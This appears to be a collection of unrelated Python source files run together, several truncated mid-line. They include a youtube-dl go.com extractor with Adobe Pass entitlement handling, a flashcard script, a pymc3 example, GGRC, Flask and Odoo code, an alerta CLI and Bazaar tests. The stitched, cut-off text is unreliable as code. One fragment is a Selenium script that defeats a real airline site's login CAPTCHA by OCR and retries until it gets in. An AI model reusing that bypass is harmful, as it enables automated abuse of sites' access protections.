            'requestor_id': 'Disney',
        },
        'watchdisneyjunior': {
            'brand': '008',
            'requestor_id': 'DisneyJunior',
        },
        'watchdisneyxd': {
            'brand': '009',
            'requestor_id': 'DisneyXD',
        }
    }
    # Matches either .../vdka<id> or .../season-N/M-<display_id>.
    _VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
    _TESTS = [{
        'url': 'http://abc.go.com/shows/castle/video/most-recent/vdka0_g86w5onx',
        'info_dict': {
            'id': '0_g86w5onx',
            'ext': 'mp4',
            'title': 'Sneak Peek: Language Arts',
            'description': 'md5:7dcdab3b2d17e5217c953256af964e9c',
        },
        'params': {
            # m3u8 download
            'skip_download': True,
        },
    }, {
        'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
        if not video_id:
            # Display-id style URL: scrape the page for the VDKA video id.
            webpage = self._download_webpage(url, display_id)
            video_id = self._search_regex(
                # There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
                # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
                r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
        site_info = self._SITE_INFO[sub_domain]
        brand = site_info['brand']
        # Content API returns a list; the first entry describes this video.
        video_data = self._download_json(
            'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
            video_id)['video'][0]
        title = video_data['title']

        formats = []
        for asset in video_data.get('assets', {}).get('asset', []):
            asset_url = asset.get('value')
            if not asset_url:
                continue
            format_id = asset.get('format')
            ext = determine_ext(asset_url)
            if ext == 'm3u8':
                video_type = video_data.get('type')
                if video_type == 'lf':
                    # 'lf' streams require an entitlement session key;
                    # accesslevel == '1' additionally needs Adobe Pass auth.
                    data = {
                        'video_id': video_data['id'],
                        'video_type': video_type,
                        'brand': brand,
                        'device': '001',
                    }
                    if video_data.get('accesslevel') == '1':
                        requestor_id = site_info['requestor_id']
                        resource = self._get_mvpd_resource(
                            requestor_id, title, video_id, None)
                        auth = self._extract_mvpd_auth(
                            url, video_id, requestor_id, resource)
                        data.update({
                            'token': auth,
                            'token_type': 'ap',
                            'adobe_requestor_id': requestor_id,
                        })
                    entitlement = self._download_json(
                        'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
                        video_id, data=urlencode_postdata(data),
                        headers=self.geo_verification_headers())
                    errors = entitlement.get('errors', {}).get('errors', [])
                    if errors:
                        error_message = ', '.join([error['message'] for error in errors])
                        raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
                    # The session key must be appended for the m3u8 to play.
                    asset_url += '?' + entitlement['uplynkData']['sessionKey']
                formats.extend(self._extract_m3u8_formats(
                    asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
            else:
                formats.append({
                    'format_id': format_id,
                    'url': asset_url,
                    'ext': ext,
                })
        self._sort_formats(formats)

        # Closed captions: XML sources are TTML in practice.
        subtitles = {}
        for cc in video_data.get('closedcaption', {}).get('src', []):
            cc_url = cc.get('value')
            if not cc_url:
                continue
            ext = determine_ext(cc_url)
            if ext == 'xml':
                ext = 'ttml'
            subtitles.setdefault(cc.get('lang'), []).append({
                'url': cc_url,
                'ext': ext,
            })

        thumbnails = []
        for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
            thumbnail_url = thumbnail.get('value')
            if not thumbnail_url:
                continue
            thumbnails.append({
                'url': thumbnail_url,
                'width': int_or_none(thumbnail.get('width')),
                'height': int_or_none(thumbnail.get('height')),
            })

        return {
            'id': video_id,
            'title': title,
            'description': video_data.get('longdescription') or video_data.get('description'),
            # duration value is in milliseconds; scale to seconds.
            'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
            'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
            'episode_number': int_or_none(video_data.get('episodenumber')),
            'series': video_data.get('show', {}).get('title'),
            'season_number': int_or_none(video_data.get('season', {}).get('num')),
            'thumbnails': thumbnails,
            'formats': formats,
            'subtitles': subtitles,
        }
#!/usr/bin/env python3 # Review Lines from the Selected Deck in Random Order Until All Pass # Written in 2012 by 伴上段 # # To the extent possible under law, the author(s) have dedicated all copyright # and related and neighboring rights to this software to the public domain # worldwide. This software is distributed without any warranty. # # You should have received a copy of the CC0 Public Domain Dedication along # with this software. If not, see # <http://creativecommons.org/publicdomain/zero/1.0/>. from argparse import * from csv import * from datetime import * from os.path import * from random import * from sys import * def Main(deckfile, logfile, commandfile, field_sep, date_format, is_dry_run, use_sm2): ret = 0 if isinstance(deckfile, str) and not exists(deckfile): stderr.write("deck file does not exist: " + deckfile + "\n") ret = 1 if not exists(logfile): stderr.write("log file does not exist: " + logfile + "\n") ret = 1 if not exists(commandfile): stderr.write("command file (pipe?) does not exist: " + commandfile + "\n") ret = 1 if ret != 0: return 1; reviewing_cards = [] failed_cards = [] deckf = None try: deckf = (open(deckfile, 'r') if isinstance(deckfile, str) else deckfile) for fields in reader(deckf, delimiter=field_sep): if len(fields) != 0: reviewing_cards.append([fields[0], field_sep.join(fields), False]) finally: if deckf is not None: deckf.close() def logreview(logf, card, command): logf.write(card[0] + field_sep + datetime.now().strftime(date_format) + field_sep + command) sm2_commands = set(str(v) + "\n" for v in range(6)) shuffle(reviewing_cards) with open(commandfile, 'r') as commandf: with open(logfile, 'a') as logf: while reviewing_cards or failed_cards: if not reviewing_cards: reviewing_cards, failed_cards = failed_cards, reviewing_cards shuffle(reviewing_cards) card = reviewing_cards.pop() stdout.write(card[1] + "\n") stdout.flush() command = commandf.readline() if use_sm2: if command in sm2_commands: if not (is_dry_run or card[-1]): 
logreview(logf, card, command) if int(command[0:1]) < 3: card[-1] = True failed_cards.append(card) elif command == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 else: # Leitner system if command == "+\n": if not (is_dry_run or card[-1]): logreview(logf, card, "+\n") elif command == "-\n": if not is_dry_run: logreview(logf, card, "-\n") card[-1] = True failed_cards.append(card) elif command.lower() == "q\n": return 0 else: stderr.write("unrecognized command: " + command + "\n") return 2 logf.flush() return 0 if __name__ == "__main__": parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=""" Review lines from standard input as though they were flashcards and log the results. Both standard input and the specified log file must be CSV files with the same field separator character, which is specified via -s. This program works with either the Leitner system or the SuperMemo algorithm, version 2 (SM-2). formatting: This program treats the first field of each nonempty line from the deck as that line's unique ID; otherwise, this program is agnostic about formatting.
New log file entries will have this format: <ID> <field-separator> <timestamp> <field-separator> <result> where <ID> is the unique ID of the line (card) associated with the record, <field-sep
arator> is the CSV field separator, <timestamp> is the record's timestamp (you can modify its format via the -f option), and <result> is the result of the review. For Leitner-system-based reviews, <result> is either '+' or '-'. '+' indicates that the user passed the review at the specified time, whereas '-' indicates that the user failed at the specified time. For SM-2-based reviews, <result> is an integer in the range [0,5] indicating the "quality of review response" that the user provided. (0 indicates a complete memory blackout whereas 5 means the review was a piece of cake.) output: This program shuffles lines and prints them to standard output one at a time in CSV format. After printing a card, this program will wait for a command from the specified command file. Commands are single-word lines terminated by standard newline (\\n) characters. For Leitner-system-based reviews, the commands are: + the user passed the card - the user didn't pass the card q the user is terminating the quiz For SM-2-based reviews, the commands are: 0 quality of review response 0 1 quality of review response 1 2 quality of review response 2 3 quality of review response 3 4 quality of review response 4 5 quality of review response 5 q the user is terminating the quiz All other values are erroneous.""") parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review") parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)") parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)") parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system") parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands") parser.add_argument("logfile", help="a CSV-formatted file containing 
records for the deck's lines") args = parser.parse_args() try: ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2) except KeyboardInterrupt: ret = 0 exit(ret)
"""Example: multivariate normal model with an LKJ prior on the correlations.

Simulates correlated 4-d normal data, then fits mean, per-dimension scale,
and the correlation matrix (LKJCorr prior) with NUTS.
"""
from pymc3 import *

import theano.tensor as t
from theano.tensor.nlinalg import matrix_inverse as inv
from numpy import array, diag, linspace
from numpy.random import multivariate_normal

# NOTE(review): ``np`` is used below but only specific numpy names are
# imported — presumably ``np`` arrives via the pymc3 star import; confirm.

# Generate some multivariate normal data:
n_obs = 1000

# Mean values:
mu = linspace(0, 2, num=4)
n_var = len(mu)

# Standard deviations:
stds = np.ones(4) / 2.0

# Correlation matrix of 4 variables:
corr = array([[1., 0.75, 0., 0.15],
              [0.75, 1., -0.06, 0.19],
              [0., -0.06, 1., -0.04],
              [0.15, 0.19, -0.04, 1.]])
cov_matrix = diag(stds).dot(corr.dot(diag(stds)))

dataset = multivariate_normal(mu, cov_matrix, size=n_obs)

# In order to convert the upper triangular correlation values to a complete
# correlation matrix, we need to construct an index matrix:
# NOTE(review): this is a float under Python 3 (``/``); np.arange accepts it
# but ``//`` would be cleaner — code appears written for Python 2.
n_elem = n_var * (n_var - 1) / 2
tri_index = np.zeros([n_var, n_var], dtype=int)
tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem)
# Reversing the (rows, cols) index pair mirrors the same values into the
# lower triangle, making tri_index symmetric.
tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem)

with Model() as model:

    mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var)

    # We can specify separate priors for sigma and the correlation matrix:
    sigma = Uniform('sigma', shape=n_var)
    corr_triangle = LKJCorr('corr', n=1, p=n_var)
    # Expand the flat triangle into a full matrix and pin the diagonal at 1.
    corr_matrix = corr_triangle[tri_index]
    corr_matrix = t.fill_diagonal(corr_matrix, 1)

    cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma)))

    like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset)


def run(n=1000):
    """Sample ``n`` draws with NUTS, initialized at the MAP estimate."""
    if n == "short":
        n = 50
    with model:
        start = find_MAP()
        step = NUTS(scaling=start)
        tr = sample(n, step=step, start=start)


if __name__ == '__main__':
    run()
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: vraj@reciprocitylabs.com
# Maintained By: vraj@reciprocitylabs.com

"""Defines a Revision model for storing snapshots."""

from ggrc import db
from ggrc.models.computed_property import computed_property
from ggrc.models.mixins import Base
from ggrc.models.types import JsonType


class Revision(Base, db.Model):
  """Revision object holds a JSON snapshot of the object at a time."""

  __tablename__ = 'revisions'

  # Identity of the snapshotted object (polymorphic: id + type name).
  resource_id = db.Column(db.Integer, nullable=False)
  resource_type = db.Column(db.String, nullable=False)
  # Event that produced this revision.
  event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False)
  action = db.Column(db.Enum(u'created', u'modified', u'deleted'),
                     nullable=False)
  # Full JSON snapshot of the object at revision time.
  content = db.Column(JsonType, nullable=False)

  # For relationship-like objects: the two endpoints of the mapping
  # (nullable — plain objects have no source/destination).
  source_type = db.Column(db.String, nullable=True)
  source_id = db.Column(db.Integer, nullable=True)
  destination_type = db.Column(db.String, nullable=True)
  destination_id = db.Column(db.Integer, nullable=True)

  @staticmethod
  def _extra_table_args(_):
    """Extra table args: index for querying revisions by author."""
    return (db.Index('revisions_modified_by', 'modified_by_id'),)

  # Attributes exposed through the JSON publishing layer.
  _publish_attrs = [
      'resource_id',
      'resource_type',
      'source_type',
      'source_id',
      'destination_type',
      'destination_id',
      'action',
      'content',
      'description',
  ]

  @classmethod
  def eager_query(cls):
    """Query with eager-loaded relations needed to render a revision."""
    from sqlalchemy import orm

    query = super(Revision, cls).eager_query()
    return query.options(
        orm.subqueryload('modified_by'),
        orm.subqueryload('event'),  # used in description
    )

  def __init__(self, obj, modified_by_id, action, content):
    """Snapshot ``obj``: record its identity, the action, and the JSON content."""
    self.resource_id = obj.id
    self.modified_by_id = modified_by_id
    self.resource_type = str(obj.__class__.__name__)
    self.action = action
    self.content = content

    # Copy mapping endpoints when present; None for non-mapping objects.
    for attr in ["source_type",
                 "source_id",
                 "destination_type",
                 "destination_id"]:
      setattr(self, attr, getattr(obj, attr, None))

  def _description_mapping(self, link_objects):
    """Compute description for revisions with <-> in display name."""
    # NOTE(review): assumes display_name contains '<->' splitting into at
    # least two parts — guaranteed by the caller's ``'<->' in display_name``
    # check.
    display_name = self.content['display_name']
    source, destination = display_name.split('<->')[:2]
    mapping_verb = "linked" if self.resource_type in link_objects else "mapped"
    if self.action == 'created':
      result = u"{1} {2} to {0}".format(source, destination, mapping_verb)
    elif self.action == 'deleted':
      result = u"{1} un{2} from {0}".format(source, destination, mapping_verb)
    else:
      result = u"{0} {1}".format(display_name, self.action)
    return result

  @computed_property
  def description(self):
    """Compute a human readable description from action and content."""
    link_objects = ['ObjectDocument']
    if 'display_name' not in self.content:
      return ''
    display_name = self.content['display_name']
    if not display_name:
      result = u"{0} {1}".format(self.resource_type, self.action)
    elif u'<->' in display_name:
      result = self._description_mapping(link_objects)
    else:
      if 'mapped_directive' in self.content:
        # then this is a special case of combined map/creation
        # should happen only for Section and Control
        mapped_directive = self.content['mapped_directive']
        if self.action == 'created':
          result = u"New {0}, {1}, created and mapped to {2}".format(
              self.resource_type, display_name, mapped_directive)
        elif self.action == 'deleted':
          result = u"{0} unmapped from {1} and deleted".format(
              display_name, mapped_directive)
        else:
          result = u"{0} {1}".format(display_name, self.action)
      else:
        # otherwise, it's a normal creation event
        result = u"{0} {1}".format(display_name, self.action)
    if self.event.action == "IMPORT":
      result += ", via spreadsheet import"
    return result
"""Environment-specific settings overlay: development flags on top of base."""
from .base import *

# Development only — never enable DEBUG in production.
DEBUG = True

# Custom mail backend; presumably delivers via the host's sendmail
# (see nr.sendmailemailbackend) — TODO confirm.
EMAIL_BACKEND = 'nr.sendmailemailbackend.EmailBackend'
# coding: utf-8
"""Admin REST endpoints for Song resources (list/bulk-get and single get)."""

from google.appengine.ext import ndb
from flask.ext import restful
import flask

from api import helpers
import auth
import model
import util

from main import api_v1


###############################################################################
# Admin
###############################################################################
@api_v1.resource('/admin/song/', endpoint='api.admin.song.list')
class AdminSongListAPI(restful.Resource):
  """List songs, or bulk-fetch specific songs by urlsafe keys."""

  @auth.admin_required
  def get(self):
    """Return songs for ?song_keys=..., else a paginated list with cursor."""
    song_keys = util.param('song_keys', list)
    if song_keys:
      song_db_keys = [ndb.Key(urlsafe=k) for k in song_keys]
      song_dbs = ndb.get_multi(song_db_keys)
      # FIX: was ``model.song.FIELDS`` — inconsistent with the three other
      # usages of ``model.Song.FIELDS`` in this module and almost certainly
      # an AttributeError on this branch.
      return helpers.make_response(song_dbs, model.Song.FIELDS)

    song_dbs, song_cursor = model.Song.get_dbs()
    return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor)


@api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song')
class AdminSongAPI(restful.Resource):
  """Fetch a single song by its urlsafe key."""

  @auth.admin_required
  def get(self, song_key):
    """Return the song, or a 404-style error if the key resolves to nothing."""
    song_db = ndb.Key(urlsafe=song_key).get()
    if not song_db:
      # NOTE(review): presumably raises/aborts; no explicit return here —
      # confirm helpers.make_not_found_exception raises.
      helpers.make_not_found_exception('song %s not found' % song_key)
    return helpers.make_response(song_db, model.Song.FIELDS)
t 2017 LasLabs Inc. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import os import mock from odoo.modules import get_module_path from odoo.tests.common import TransactionCase from odoo.tools import mute_logger from odoo.addons.module_auto_update.addon_hash import addon_hash from ..models.module_deprecated import PARAM_DEPRECATED model = 'odoo.addons.module_auto_update.models.module' class EndTestException(Exception): pass class TestModule(TransactionCase): def setUp(self): super(TestModule, self).setUp() module_name = 'module_auto_update' self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1") self.own_module = self.env['ir.module.module'].search([ ('name', '=', module_name), ]) self.own_dir_path = get_module_path(module_name) keep_langs = self.env['res.lang'].search([]).mapped('code') self.own_checksum = addon_hash( self.own_dir_path, exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'], keep_langs=keep_langs, ) self.own_writeable = os.access(self.own_dir_path, os.W_OK) @mock.patch('%s.get_module_path' % model) def create_test_module(self, vals, get_module_path_mock): get_module_path_mock.return_value = self.own_dir_path test_module = self.env['ir.module.module'].create(vals) return test_module def test_store_checksum_installed_state_installed(self): """It should set the module's checksum_installed equal to checksum_dir when vals contain a ``latest_version`` str.""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': '1.0'}) self.assertEqual( self.own_module.checksum_installed, self.own_module.checksum_dir, ) def test_store_checksum_installed_state_uninstalled(self): """It should clear the module's checksum_installed when vals contain ``"latest_version": False``""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': False}) self.assertIs(self.own_module.checksum_installed, False) def 
test_store_checksum_installed_vals_contain_checksum_installed(self): """It should not set checksum_installed to False or checksum_dir when a checksum_installed is included in vals""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({ 'state': 'installed', 'checksum_installed': 'test', }) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing checksum_installed in vals did not prevent overwrite', ) def test_store_checksum_installed_with_retain_context(self): """It should not set checksum_installed to False or checksum_dir when self has context retain_checksum_installed=True""" self.own_module.checksum_installed = 'test' self.own_module.with_context( retain_checksum_installed=True, )._store_checksum_installed({'state': 'installed'}) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing retain_checksum_installed context did not prevent ' 'overwrite', ) @mock.patch('%s.get_module_path' % model) def test_button_uninstall_no_recompute(self, module_path_mock): """It should not attempt update on `button
_uninstall`.""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) uninstall_module.button_uninstall() self.assertNotEqual( test_module.st
ate, 'to upgrade', 'Auto update logic was triggered during uninstall.', ) def test_button_immediate_uninstall_no_recompute(self): """It should not attempt update on `button_immediate_uninstall`.""" uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) try: mk = mock.MagicMock() uninstall_module._patch_method('button_uninstall', mk) mk.side_effect = EndTestException with self.assertRaises(EndTestException): uninstall_module.button_immediate_uninstall() finally: uninstall_module._revert_method('button_uninstall') def test_button_uninstall_cancel(self): """It should preserve checksum_installed when cancelling uninstall""" self.own_module.write({'state': 'to remove'}) self.own_module.checksum_installed = 'test' self.own_module.button_uninstall_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Uninstall cancellation does not preserve checksum_installed', ) def test_button_upgrade_cancel(self): """It should preserve checksum_installed when cancelling upgrades""" self.own_module.write({'state': 'to upgrade'}) self.own_module.checksum_installed = 'test' self.own_module.button_upgrade_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Upgrade cancellation does not preserve checksum_installed', ) def test_create(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() try: self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } self.create_test_module(vals) _store_checksum_installed_mock.assert_called_once_with(vals) finally: self.env['ir.module.module']._revert_method( '_store_checksum_installed', ) @mute_logger("openerp.modules.module") @mock.patch('%s.get_module_path' % model) def test_get_module_list(self, module_path_mock): """It should change the state of modules with different checksum_dir and checksum_installed to 'to 
upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' self.env['base.module.upgrade'].get_module_list() self.assertEqual( test_module.state, 'to upgrade', 'List update does not mark upgradeable modules "to upgrade"', ) @mock.patch('%s.get_module_path' % model) def test_get_module_list_only_changes_installed(self, module_path_mock): """It should not change the state of a module with a former state other than 'installed' to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'uninstalled', } test_module = self.create_test_module(vals) self.env['base.module.upgrade'].get_module_list() self.assertNotEqual( test_module.state, 'to upgrade', 'List update changed state of an uninstalled module', ) def test_write(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = {'state': 'installed'} self.own_module.write(vals) _store_checksu
import json

import click
from tabulate import tabulate


@click.command('notes', short_help='List notes')
@click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)')
@click.pass_obj
def cli(obj, alert_id):
    """List notes."""
    client = obj['client']
    # --alert-id is effectively mandatory: bail out early when it is missing.
    if not alert_id:
        raise click.UsageError('Need "--alert-id" to list notes.')

    if obj['output'] == 'json':
        # Raw JSON output straight from the API endpoint.
        response = client.http.get('/alert/{}/notes'.format(alert_id))
        click.echo(json.dumps(response['notes'], sort_keys=True, indent=4, ensure_ascii=False))
    else:
        # Tabular output rendered with the configured table format.
        tz = obj['timezone']
        headers = {
            'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE',
            'attributes': 'ATTRIBUTES', 'createTime': 'CREATED',
            'updateTime': 'UPDATED', 'related': 'RELATED ID',
            'customer': 'CUSTOMER'
        }
        rows = [note.tabular(tz) for note in client.get_alert_notes(alert_id)]
        click.echo(tabulate(rows, headers=headers, tablefmt=obj['output']))
# -*- coding: utf-8 -*-
# Log in to higo.flycua.com with python + selenium, reading the CAPTCHA
# image via pytesseract OCR.  Keeps retrying until the login succeeds.
#
import re
import requests
import pytesseract
from selenium import webdriver
# BUGFIX: the original line was "from PIL import Image,Image" (Image imported
# twice); ImageEnhance is what the contrast-enhancement step below needs.
from PIL import Image, ImageEnhance
import time

driver = webdriver.Chrome()
driver.maximize_window()
driver.get("https://higo.flycua.com/hp/html/login.html")
driver.implicitly_wait(30)

# Credentials masked (personal information).
driver.find_element_by_name('memberId').send_keys('xxxxxx')
driver.find_element_by_name('password').send_keys('xxxxxx')

# Matches a single alphanumeric character; hoisted out of the loops so it is
# compiled once instead of once per OCR'd character.
ALNUM_RE = re.compile(r'[a-zA-Z0-9]')

# The CAPTCHA is rarely recognised on the first attempt, so loop until the
# login succeeds (success is detected via the tokenId cookie below).
while True:
    # Clear the CAPTCHA box - it may hold a wrong guess from a previous pass.
    driver.find_element_by_name("verificationCode").clear()
    # Where the full-page screenshot / cropped CAPTCHA image is saved.
    screenImg = "H:\screenImg.png"
    # Screenshot the whole page.
    driver.get_screenshot_as_file(screenImg)
    # Locate the CAPTCHA element so it can be cropped out of the screenshot.
    location = driver.find_element_by_name('authImage').location
    size = driver.find_element_by_name('authImage').size
    # NOTE(review): the pixel offsets below were tuned by hand because the
    # element coordinates alone did not crop the right region; re-tune them
    # against a saved screenshot if the page layout changes.
    left = location['x'] + 530
    top = location['y'] + 175
    right = location['x'] + size['width'] + 553
    bottom = location['y'] + size['height'] + 200
    # Crop the CAPTCHA region and post-process it to help the OCR.
    img = Image.open(screenImg).crop((left, top, right, bottom))
    img = img.convert('RGBA')
    img = img.convert('L')  # greyscale
    # BUGFIX: the original called Image.Contrast(img), which does not exist;
    # contrast enhancement lives in PIL.ImageEnhance.
    img = ImageEnhance.Contrast(img).enhance(2.0)
    img.save(screenImg)
    # Re-read the processed image and run the OCR.
    img = Image.open(screenImg)
    code = pytesseract.image_to_string(img)
    # Keep only alphanumeric characters from the OCR result.
    b = ''
    for ch in code.strip():
        if ALNUM_RE.search(ch) is not None:
            b += ch
    print(b)
    # Type the cleaned-up guess and submit the form.
    driver.find_element_by_name("verificationCode").send_keys(b)
    driver.find_element_by_class_name('login-form-btn-submit').click()
    # The site throttles wrong guesses, so give it a moment before retrying.
    time.sleep(5)
    # A tokenId cookie means the login worked.
    cookie1 = str(driver.get_cookies())
    print(cookie1)
    matchObj = re.search(r'tokenId', cookie1, re.M | re.I)
    if matchObj:
        print(matchObj.group())
        break
    else:
        print("No match!!")
print('结束')
""" def create_repository(self, shared=False): """See ControlDir.create_repository.""" return "A repository" def open_repository(self): """See ControlDir.open_repository.""" return SampleRepository(self) def create_branch(self, name=None): """See ControlDir.create_branch.""" if name is not None: raise NoColocatedBranchSupport(self) return SampleBranch(self) def create_workingtree(self): """See ControlDir.create_workingtree.""" return "A tree" class SampleBzrDirFormat(bzrdir.BzrDirFormat): """A sample format this format is initializable, unsupported to aid in testing the open and open_downlevel routines. """ def get_format_string(self): """See BzrDirFormat.get_format_string().""" return "Sample .bzr dir format." def initialize_on_transport(self, t): """Create a bzr dir.""" t.mkdir('.bzr') t.put_bytes('.bzr/branch-format', self.get_format_string()) return SampleBzrDir(t, self) def is_supported(self): return False def open(self, transport, _found=None): return "opened branch." @classmethod def from_string(cls, format_string): return cls() class BzrDirFormatTest1(bzrdir.BzrDirMetaFormat1): @staticmethod def get_format_string(): return "Test format 1" class BzrDirFormatTest2(bzrdir.BzrDirMetaFormat1): @staticmethod def get_format_string(): return "Test format 2" class TestBzrDirFormat(TestCaseWithTransport): """Tests for the BzrDirFormat facility.""" def test_find_format(self): # is the right format object found for a branch? # create a branch with a few known format objects. 
bzrdir.BzrProber.formats.register(BzrDirFormatTest1.get_format_string(), BzrDirFormatTest1()) self.addCleanup(bzrdir.BzrProber.formats.remove, BzrDirFormatTest1.get_format_string()) bzrdir.BzrProber.formats.register(BzrDirFormatTest2.get_format_string(), BzrDirFormatTest2()) self.addCleanup(bzrdir.BzrProber.formats.remove, BzrDirFormatTest2.get_format_string()) t = self.get_transport() self.build_tree(["foo/", "bar/"], transport=t) def check_format(format, url): format.initialize(url) t = _mod_transport.get_transport_from_path(url) found_format = bzrdir.BzrDirFormat.find_format(t) self.assertIsInstance(found_format, format.__class__) check_format(BzrDirFormatTest1(), "foo") check_format(BzrDirFormatTest2(), "bar") def test_find_format_nothing_there(self): self.assertRaises(NotBranchError, bzrdir.BzrDirFormat.find_format, _mod_transport.get_transport_from_path('.')) def test_find_format_unknown_format(self): t = self.get_transport() t.mkdir('.bzr') t.put_bytes('.bzr/branch-format', '') self.assertRaises(UnknownFormatError, bzrdir.BzrDirFormat.find_format, _mod_transport.get_transport_from_path('.')) def test_register_unregister_format(self): format = SampleBzrDirFormat() url = self.get_url() # make a bzrdir format.initialize(url) # register a format for it. bzrdir.BzrProber.formats.register(format.get_format_string(), format) # which bzrdir.Open will refuse (not supported) self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open, url) # which bzrdir.open_containing will refuse (not supported) self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open_containing, url) # but open_downlevel will work t = _mod_transport.get_transport_from_url(url) self.assertEqual(format.open(t), bzrdir.BzrDir.open_unsupported(url)) # unregister the format bzrdir.BzrProber.formats.remove(format.get_format_string()) # now open_downlevel should fail too. 
self.assertRaises(UnknownFormatError, bzrdir.BzrDir.open_unsupported, url) def test_create_branch_and_repo_uses_default(self): format = SampleBzrDirFormat() branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url(), format=format) self.assertTrue(isinstance(branch, SampleBranch)) def test_create_branch_and_repo_under_shared(self): # creating a branch and repo in a shared repo uses the # shared repository format = controldir.format_registry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) branch = bzrdir.BzrDir.create_branch_and_repo( self.get_url('child'), format=format) self.assertRaises(errors.NoRepositoryPresent, branch.bzrdir.open_repository) def test_create_branch_and_repo_under_shared_force_new(self): # creating a branch and repo in a shared repo can be forced to # make a new repo format = controldir.format_re
gistry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url('child'), force_new_repo=True, format=format) branch.bzrdir.open
_repository() def test_create_standalone_working_tree(self): format = SampleBzrDirFormat() # note this is deliberately readonly, as this failure should # occur before any writes. self.assertRaises(errors.NotLocalUrl, bzrdir.BzrDir.create_standalone_workingtree, self.get_readonly_url(), format=format) tree = bzrdir.BzrDir.create_standalone_workingtree('.', format=format) self.assertEqual('A tree', tree) def test_create_standalone_working_tree_under_shared_repo(self): # create standalone working tree always makes a repo. format = controldir.format_registry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) # note this is deliberately readonly, as this failure should # occur before any writes. self.assertRaises(errors.NotLocalUrl, bzrdir.BzrDir.create_standalone_workingtree, self.get_readonly_url('child'), format=format) tree = bzrdir.BzrDir.create_standalone_workingtree('child', format=format) tree.bzrdir.open_repository() def test_create_branch_convenience(self): # outside a repo the default convenience output is a repo+branch_tree format = controldir.format_registry.make_bzrdir('knit') branch = bzrdir.BzrDir.create_branch_convenience('.', format=format) branch.bzrdir.open_workingtree() branch.bzrdir.open_repository() def test_create_branch_convenience_possible_transports(self): """Check that the optional 'possible_transports' is recognized""" format = controldir.format_registry.make_bzrdir('knit') t = self.get_transport() branch = bzrdir.BzrDir.create_branch_convenience( '.', format=format, possible_transports=[t]) branch.bzrdir.open_workingtree() branch.bzrdir.open_repository() def test_create_branch_convenience_root(self): """Creating a branch at the root of a fs should work.""" self.vfs_transport_factory = memory.MemoryServer # outside a repo the default convenience output is a 